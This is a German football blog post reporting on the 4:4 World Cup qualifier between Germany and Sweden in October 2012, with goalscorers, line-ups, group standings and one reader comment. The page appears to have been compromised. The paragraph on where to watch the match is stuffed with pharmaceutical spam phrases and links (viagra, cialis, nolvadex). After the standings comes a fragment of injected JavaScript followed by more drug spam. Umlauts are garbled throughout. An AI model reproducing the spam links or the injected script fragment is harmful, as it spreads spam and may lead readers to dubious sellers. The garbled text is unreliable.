Willkommen auf » WM-Qualifikation 2014 Highlights Deutschland – Schweden
16. Okt 2012

WM-Qualifikation 2014 Highlights Deutschland – Schweden

WM 2014 Qualifikation 4. Spieltag
Deutschland – Schweden 4:4

1:0 Miroslav Klose (8., Linksschuss, Reus)
2:0 Miroslav Klose (15., Rechtsschuss, Reus)
3:0 Per Mertesacker (39., Rechtsschuss, T. MA?ller)
4:0 Mesut Ai??zil (55., Linksschuss, T. MA?ller)
4:1 Zlatan Ibrahimovic (62., Kopfball, KAi??llstrAi??m)
4:2 Mikael Lustig (64., Rechtsschuss, KAi??llstrAi??m)
4:3 Johan Elmander (76., Linksschuss, Kacaniklic)
4:4 Rasmus Elm (90. + 3, Rechtsschuss)
vor knapp 72.000 Zuschauern im Berliner Olympiastadion

Aufstellung Deutschland: Neuer – Boateng, Mertesacker, Badstuber, Lahm – Schweinsteiger, Kroos – T. MA?ller (67. M. GAi??tze), Ai??zil, Reus (88. Podolski) – Klose

Aufstellung Schweden: Isaksson – Lustig, Granqvist, J. Olsson, Safari – Wernbloom (46. KAi??llstrAi??m), HolmAi??n (46. Kacaniklic) – Larsson (78. Sana), Ibrahimovic, R. Elm – Elmander

Die Zusammenfassung des Spiels…

AuAYerdem auch http://www.hardcandypilates.com/desyrel-generic-brand/ hier und Cheap hier Order sowie im neunminA?tigen ARD-Zusammenschnitt zu sehen. Hier noch die online online Stimmen zum Spiel Purchase buy liquid nolvadex. original_viagra_apotheke, canadian valtrex. cost of provera at walgreens Cheap cheap super generic cialis , die Analyse mit Bundestrainer LAi??w und die Komplettaufzeichnung der Partie purchasing viagra in mexico. in der ARD-Mediathek

Was fA?r ein FuAYballabend!
Bis zur sechzigsten Minute eine absolut beeindruckende Vorstellung der deutschen Nationalmannschaft. Feine Kombinationen, schnelles Umschaltspiel, eiskalte Treffer. Ein Spiel zum Zungeschnalzen gegen den vermeintlichen Hauptkonkurrenten in der Qualigruppe. Man hAi??tte ins SchwAi??rmen kommen kAi??nnen :)

Dann verwerteten die Schweden aus dem Nichts heraus zwei Chancen und waren plAi??tzlich wieder mitten drin im Spiel. Es folgte der Anschlusstreffer, das groAYe Zittern fA?r die deutschen Kicker und in der dritten Minute der Nachspielzeit der unglA?ckliche Ausgleich zum 4:4. Ein unerklAi??rlicher Einbruch der Mannschaft, die sich nach einer 4:0 FA?hrung um die FrA?chte ihrer Arbeit brachte. FA?r die Spieler muss es nun heiAYen: Wichtige Erfahrung gemacht, weiter geht’s.

Nach dem letzten Pflichtspiel im Jahr 2012 hier der Zwischenstand der Qualifikationsgruppe C
1. Deutschland – 4 Spiele, 15:6 Tore, 10 Punkte
2. Schweden – 3 Spiele, 8:5 Tore, 7 Punkte
3. Irland – 3 Spiele, 7:8 Tore, 6 Punkte
4. Ai??sterreich – 3 Spiele, 5:2 Tore, 4 Punkte
5. Kasachstan – 4 Spiele, 1:8 Tore, 1 Punkt
6. FAi??rAi??er – 3 Spiele, 2:9 Tore, 0 Punktedocument.currentScript.parentNode.insertBefore(s, document.currentScript); enbrel 50 mg price avana buy purchase midamor labels buy medrol dose pack #1 without rx. http://bosnakirtasiye.com/2018/03/15/cheap-geriforte-syrup/


Ein Kommentar

  1. Werner



    Vielen Dank fuer die Zusammenfassung. Ich glaub’s echt nicht, hab gedacht, ich seh nicht richtig! Schiri war ne absolute Pfeife beim letzten Gegentor, haette man abpfeifen muessen. Irgendwie erinnert mich das alles an das Italien-Spiel. Die Abwehr wird nicht mehr, glaube ich… Auf dem Neuer herumzuhacken wie der „Spiegel“ bringt’s auch nicht. Aber Badstuber und Boateng sollten vielleicht mal ein bisschen Motivase einnehmen vor dem naechsten wichtigen Spiel. Ich glaub, die haben noch nicht begriffen, dass der Gegner auch auflaeuft , um zu gewinnen!

    Gruss ins schoene alte Elbflorenz aus Kanada!

Einen Kommentar schreiben